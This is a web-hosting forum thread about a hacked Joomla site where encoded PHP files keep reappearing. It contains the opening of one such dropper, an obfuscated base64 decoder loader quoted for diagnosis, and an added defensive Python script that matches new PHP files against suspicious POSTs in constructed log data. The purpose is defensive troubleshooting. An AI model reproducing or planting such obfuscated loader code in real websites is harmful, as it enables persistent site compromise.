Cleaning up hacked websites

Discussion in 'H-Sphere Reseller Hosting' started by Bunchadogs, Jul 20, 2016.

  1. Bunchadogs

    Bunchadogs Perch

    I have a website that was recently hacked - reported by Google/Norton/etc. and blacklisted everywhere - what a nightmare!

    We were able to get it MOSTLY cleaned up - enough that Google and the others 'scanned' it and reported as clean again.

    However - there is still a problem. Just about every day a few PHP files will appear in random locations.
    They have random file names and appear in random locations (rarely the same), and the contents are encoded:

    <?php
    $eieahu = 4357; function tjyjq($nomeyctqc, $qtkqhm){$yqnpmwt = ''; for($i=0; $i < strlen($nomeyctqc); $i++){$yqnpmwt .= isset($qtkqhm[$nomeyctqc[$i]]) ? $qtkqhm[$nomeyctqc[$i]] : $nomeyctqc[$i];}
    $qhnnrpwfve="base" . "64_decode";return $qhnnrpwfve($yqnpmwt);}
    $mfhprk = 'NZ2CztXkKlNb5JtOxVXOlJn9KOxEcHgtsHwLowiTNZ2CztXkKlNb5'.
    'Jn9KdX2xM59xMqMFU8wTsEhU07LAV2GxJtiTUSfQlmGKlm2QPtizWXClP4L'.

    I can find these files easily enough - but I can't identify WHERE they are coming from.

    The website is built on Joomla - we've updated to the latest 3.5.x version, updated plugins, etc.

    At one point we changed EVERY user password (via phpMyAdmin) and the FTP password and the MySQL password. We only updated the config file with the new SQL password - to keep the site running - but didn't login anywhere else. We didn't even update the FTP password in the config file. All of that was done via a clean and secure laptop, all via the Control Panel.

    The idea was to isolate any infected PCs and make sure the "leak" was coming from an outside user...

    No luck - the same evening multiple files showed up again. The laptop used to reset all the passwords was not connected to any network at the time, so I am 100% certain the source of the files is not an infected PC.

    I can NOT find these files in the Access Log, under the Control Panel.

    Interesting side note - we've blocked a LOT of IP addresses and ranges (via htaccess) and the day AFTER a file appears I can see a number of error messages where a request was rejected for the same file I previously deleted. The rejection is based on our IP blocking.

    Any ideas how I can track down the SOURCE of these PHP files?

    I'm assuming it's a back door of some sort, but I have not had any luck tracking it down.

    We've deleted entire directory structures and replaced them with new installs - but that doesn't seem to help.

    I've scoured the logs via the Control Panel (Access and Error) and used some of the info to block IP addresses and even identify a few files. But the mystery files still appear almost every day.

    If I supply a file name and directory can Jodo identify WHERE that file came from?

    Anyone else have any ideas how to track down the source of the problem?
  2. Bunchadogs

    Bunchadogs Perch

    While I was typing the above, two files appeared:

    Although the dates show they were "modified" yesterday, they are new files that just appeared today (just a few minutes ago)

    Looking at the Access (Transfer) log in the control panel I can see activity at the time, and at least one suspicious "POST" - but nothing specific to those files.
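An added example, not from this thread or from JodoHost: a small Python triage script that does the correlation the poster was doing by hand. It lists .php files whose inode changed recently (using ctime, since the dropper's mtime was visibly backdated) and then pulls every POST to a PHP script from the access log in the minutes before the dropped file appeared, which is where the back door or vulnerable extension that wrote it usually shows up. The log lines, IP addresses, paths and the creation time are all constructed.

```python
import os
import re
from datetime import datetime, timedelta, timezone
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Parse one Apache/nginx combined-format line (ts like 20/Jul/2016:14:02:11 +0000)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def suspicious_posts(log_lines, dropped_at, window_minutes=30):
    """POSTs to .php paths in the window before the dropper appeared: the back door
    or vulnerable extension that wrote the file is normally driven by such a POST."""
    start = dropped_at - timedelta(minutes=window_minutes)
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "POST" and ".php" in rec["path"]
                and start <= rec["ts"] <= dropped_at):
            hits.append((rec["ip"], rec["path"], rec["ts"]))
    return hits

def recent_php_files(root, hours=24, now=None):
    """.php files under root created/changed in the last `hours`; st_ctime is used
    because a dropper can backdate mtime ('modified yesterday') but not ctime."""
    now = now or datetime.now(timezone.utc)
    cutoff = (now - timedelta(hours=hours)).timestamp()
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(".php") and os.stat(path).st_ctime >= cutoff:
                found.append(path)
    return sorted(found)

# Constructed sample data: documentation IP ranges, invented paths, made-up ctime.
DROPPED_AT = datetime(2016, 7, 20, 14, 2, 11, tzinfo=timezone.utc)
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2016:13:40:02 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Jul/2016:13:52:17 +0000] "POST /images/stories/cache.php HTTP/1.1" 200 31 "-" "python-requests/2.9"
203.0.113.5 - - [20/Jul/2016:13:58:44 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
198.51.100.9 - - [20/Jul/2016:12:10:00 +0000] "POST /old/test.php HTTP/1.1" 404 210 "-" "curl/7.47"
""".splitlines()
```

Run recent_php_files against the web root from cron, and feed each new file's ctime to suspicious_posts against the day's raw access log; the scripts it names (not the dropped file itself) are the ones to inspect or remove.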
  3. Manoj Saini

    Manoj Saini Super Moderator Staff Member

    Please raise a support ticket with the domain name and file details. We will check logs at the server side and will update you back as soon as possible.
